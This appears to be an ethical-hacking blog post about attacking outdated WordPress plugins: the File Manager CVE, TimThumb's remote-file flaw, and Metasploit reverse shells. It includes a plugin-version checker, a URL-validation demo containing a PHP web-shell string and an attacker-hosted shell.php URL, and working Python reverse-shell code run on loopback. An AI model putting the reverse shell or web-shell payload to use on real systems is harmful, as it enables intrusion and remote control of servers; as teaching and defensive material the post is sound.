wordpress
ethical-hacking
reverse-shell
metasploit
revslider
vulnerable plugins
Sometimes, websites seem harmless. A beer blog, a visual gallery, a friendly portal. But if you pause for a second… and look behind the facade… you’ll see an opportunity.
Today we’ll learn how poorly managed plugins can become serious attack vectors.
WordPress allows you to extend its functionality through small modules called plugins. These let you:
The problem is that many of these plugins are written by third parties, and if they are not updated regularly they can keep carrying publicly known vulnerabilities long after a fix has been released.
File Manager was a legitimate WordPress plugin designed to provide a web interface for server file management. With over 700,000 active installations, it became an essential tool for many admins who preferred to manage files directly from the WordPress dashboard.
In September 2020, security researchers discovered a critical vulnerability in File Manager versions 6.0 through 6.8 (fixed in 6.9). The issue was in a specific plugin file that:
This vulnerability was assigned CVE-2020-25213, and the researchers who reported it rated it CVSS 10.0, the highest possible score. The response was immediate but complex:
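The point made above about outdated third-party plugins, and the File Manager case in particular, can be checked from the outside without touching the vulnerability itself: WordPress plugins ship a `readme.txt` under `/wp-content/plugins/<slug>/` whose `Stable tag:` line states the packaged version, and File Manager's slug is `wp-file-manager`. The following is an added example, not code from the original post: the readme bodies are constructed samples (the two `example-*` plugins are hypothetical), the vulnerable range 6.0 to 6.8 is the one published for CVE-2020-25213, and `fetch_readme` is an optional live helper that the offline demo never calls.

```python
import re
import urllib.request
from typing import Optional, Tuple

# Constructed sample readme.txt bodies (not fetched from any site). On a real target the
# same text comes from GET /wp-content/plugins/<slug>/readme.txt.
SAMPLE_READMES = {
    "wp-file-manager": "=== File Manager ===\nContributors: example\nStable tag: 6.8\nTested up to: 5.5\n",
    "example-gallery": "=== Example Gallery ===\nStable tag: trunk\n",       # hypothetical plugin, no pinned version
    "example-beer-widget": "=== Example Beer Widget ===\nStable tag: 2.3.1\n",  # hypothetical plugin
}

# Known-vulnerable ranges as (first affected, first fixed, reference).
# File Manager: CVE-2020-25213, affected 6.0-6.8, fixed in 6.9.
VULNERABLE_RANGES = {
    "wp-file-manager": ((6, 0), (6, 9), "CVE-2020-25213"),
}

def parse_stable_tag(readme: str) -> Optional[str]:
    """Pull the value of the 'Stable tag:' header line, if present."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme, re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None

def version_tuple(version: str) -> Optional[Tuple[int, ...]]:
    """'6.8' -> (6, 8); non-numeric tags such as 'trunk' cannot be compared and give None."""
    if not re.fullmatch(r"\d+(?:\.\d+)*", version):
        return None
    return tuple(int(part) for part in version.split("."))

def assess_plugin(slug: str, readme: str) -> Tuple[str, Optional[str], str]:
    """Return (slug, stable tag, verdict) by comparing the tag against the local range table."""
    tag = parse_stable_tag(readme)
    ver = version_tuple(tag) if tag else None
    if ver is None:
        return slug, tag, "version unknown"
    if slug in VULNERABLE_RANGES:
        first_bad, first_fixed, ref = VULNERABLE_RANGES[slug]
        if first_bad <= ver < first_fixed:  # tuple comparison handles 6.8 < 6.9 and 6.10 > 6.9
            fixed = ".".join(map(str, first_fixed))
            return slug, tag, f"VULNERABLE ({ref}, fixed in {fixed})"
    return slug, tag, "no match in local vulnerability table"

def assess_all(readmes=SAMPLE_READMES):
    return [assess_plugin(slug, body) for slug, body in readmes.items()]

def fetch_readme(base_url: str, slug: str, timeout: float = 5.0) -> Optional[str]:
    """Live helper (not used by the offline demo): fetch readme.txt for a plugin slug."""
    url = f"{base_url.rstrip('/')}/wp-content/plugins/{slug}/readme.txt"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return None  # 404, blocked or unreachable: nothing to assess

if __name__ == "__main__":
    for slug, tag, verdict in assess_all():
        print(f"{slug:22} {str(tag):8} {verdict}")
```

Two caveats a tester should keep in mind: `Stable tag` is the version the author packaged, not proof of what is deployed (some sites patch the PHP without updating the readme, and some remove readme.txt entirely), and a `trunk` tag tells you nothing, so treat "version unknown" as a prompt to fingerprint the plugin another way rather than as a clean result.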
TimThumb was a PHP library widely adopted by the WordPress community for dynamic image resizing. Its popularity was due to its simplicity: developers could easily integrate it into their themes to generate thumbnails automatically without pre-processing images.
The timthumb.php script worked by receiving parameters via GET, where you specified the image source and desired dimensions. This seemingly innocent functionality hid a serious security issue in its early versions.
The critical flaw was the lack of proper input validation. TimThumb accepted remote URLs as image sources and downloaded them to the server for processing. However, it did not properly check:
This combination allowed an attacker to make the server download and store malicious PHP files, which could then be executed directly through the browser.
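The input-validation failure described above is easiest to see side by side with its fix. The block below is an added example, not TimThumb's source: the allowlist entries are illustrative, `is_allowed_substring` models the weak class of check (does an allowed name appear anywhere in the URL string?), and `is_allowed_host` plus `looks_like_image` and `cache_filename` show the three controls a hardened fetcher needs: match the parsed hostname, check the bytes you downloaded, and store them under a non-executable name. The URLs and payloads are constructed inputs.

```python
import hashlib
from urllib.parse import urlparse

# Allowlist of remote image hosts in the style early TimThumb shipped
# (illustrative entries, not a copy of TimThumb's own list).
ALLOWED_SITES = ("flickr.com", "picasa.com", "blogger.com", "wordpress.com", "img.youtube.com")

def is_allowed_substring(src: str) -> bool:
    """Weak check: the allowed name may appear ANYWHERE in the URL string."""
    return any(site in src for site in ALLOWED_SITES)

def is_allowed_host(src: str) -> bool:
    """Hardened check: parse the URL and compare the real hostname, exact or as a subdomain."""
    parts = urlparse(src)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower()
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)

IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")

def looks_like_image(data: bytes) -> bool:
    """Content check: accept only bytes that start with a JPEG, PNG or GIF signature."""
    return data.startswith(IMAGE_MAGIC)

def cache_filename(src: str) -> str:
    """Content-derived name with a non-executable extension; never reuse the remote filename."""
    return hashlib.sha256(src.encode()).hexdigest() + ".img"

def decide_fetch(src: str, payload: bytes) -> str:
    """Hardened pipeline: host allowlist, then magic bytes, then a safe cache name."""
    if not is_allowed_host(src):
        return "rejected: host not allowed"
    if not looks_like_image(payload):
        return "rejected: payload is not an image"
    return "cached as " + cache_filename(src)

# Constructed inputs for the demo
LEGIT = "http://farm1.flickr.com/photo.jpg"
BYPASS = "http://blogger.com.attacker.example/shell.php"      # attacker-controlled host
QUERY_TRICK = "http://attacker.example/x.php?ref=flickr.com"  # allowed name only in the query
PHP_PAYLOAD = b"<?php system($_GET['c']); ?>"
PNG_PAYLOAD = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for url in (LEGIT, BYPASS, QUERY_TRICK):
        print(f"{url}\n  substring check: {is_allowed_substring(url)}  host check: {is_allowed_host(url)}")
    print(decide_fetch(BYPASS, PHP_PAYLOAD))
    print(decide_fetch(LEGIT, PHP_PAYLOAD))
    print(decide_fetch(LEGIT, PNG_PAYLOAD))
```

Note that the magic-byte check alone is not sufficient: a polyglot that starts with a GIF header and carries PHP after it passes `looks_like_image`. What actually stops execution is the last step, storing the download under a name the web server will not hand to the PHP interpreter, ideally in a cache directory where script execution is disabled outright.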
The TimThumb vulnerability was devastating because:
Think of it this way:
The idea is to plant a reverse shell that connects from the victim to the attacker, and once inside… explore.
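The connection direction described above is the whole point of a reverse shell: the victim initiates an outbound connection, which gets through firewalls that only filter inbound traffic. The block below is an added example, not code from the original post or a Metasploit payload: both ends run in one process on 127.0.0.1 so it can be executed safely offline, the "victim" side connects back and executes each line it receives, and the "attacker" side reads the result through a small length-prefixed framing that is my own (real payloads pipe a shell's stdin/stdout straight to the socket). The commands run are constructed, harmless inputs.

```python
import socket
import subprocess
import threading

def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise if the peer goes away."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed")
        buf += chunk
    return buf

def victim_connect_back(attacker_host: str, attacker_port: int) -> None:
    """Victim side: OUTBOUND connection to the attacker, then run each received line as a command."""
    with socket.create_connection((attacker_host, attacker_port)) as s:
        rfile = s.makefile("rb")
        for line in rfile:
            cmd = line.decode("utf-8", "replace").strip()
            if cmd == "exit":
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True)
            out = proc.stdout + proc.stderr
            s.sendall(len(out).to_bytes(4, "big") + out)  # 4-byte length prefix, then output

def attacker_run(conn: socket.socket, cmd: str) -> bytes:
    """Attacker side: send one command line, collect its framed output."""
    conn.sendall(cmd.encode() + b"\n")
    n = int.from_bytes(recv_exact(conn, 4), "big")
    return recv_exact(conn, n)

def reverse_shell_demo(commands, host: str = "127.0.0.1"):
    """Listener (attacker) accepts the victim's callback and drives it; returns each command's output."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((host, 0))          # port 0: let the OS pick a free port
    listener.listen(1)
    listener.settimeout(5)
    port = listener.getsockname()[1]
    victim = threading.Thread(target=victim_connect_back, args=(host, port), daemon=True)
    victim.start()                    # the victim dials out; the attacker only listens
    conn, _ = listener.accept()
    results = []
    with conn:
        for cmd in commands:
            results.append(attacker_run(conn, cmd))
        conn.sendall(b"exit\n")
    victim.join(timeout=5)
    listener.close()
    return results

if __name__ == "__main__":
    for cmd, out in zip(["echo hello", "id"], reverse_shell_demo(["echo hello", "id"])):
        print(f"$ {cmd}\n{out.decode(errors='replace')}", end="")
```

The defensive reading of the same code: on the victim, a web-server worker (the user PHP runs as) spawned a shell whose stdin is a network socket, and the host opened an outbound TCP connection it has no business making. Egress filtering on the web tier and alerting on shells parented by the web server process are the two controls that catch this regardless of which plugin was the way in.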
Metasploit is one of the most powerful frameworks for exploiting known vulnerabilities.
It allows you to:
This exercise is a classic example of using Metasploit in its most direct form.
Metasploit isn’t magic. It’s precision, and if you know how to speak to it, it opens doors.
The site seems to be celebrating. But maybe it celebrates too much. The attack isn’t in what’s visible. It’s in what’s unprotected, in what’s already patched… but not here.
Plugins are doors. Your job is to find the ones left open.
Where many see an old site with banners and sliders… you should see vectors, versions, and backdoors. Because in offensive cybersecurity, the enemy is negligence and your advantage is observation.
Cheers!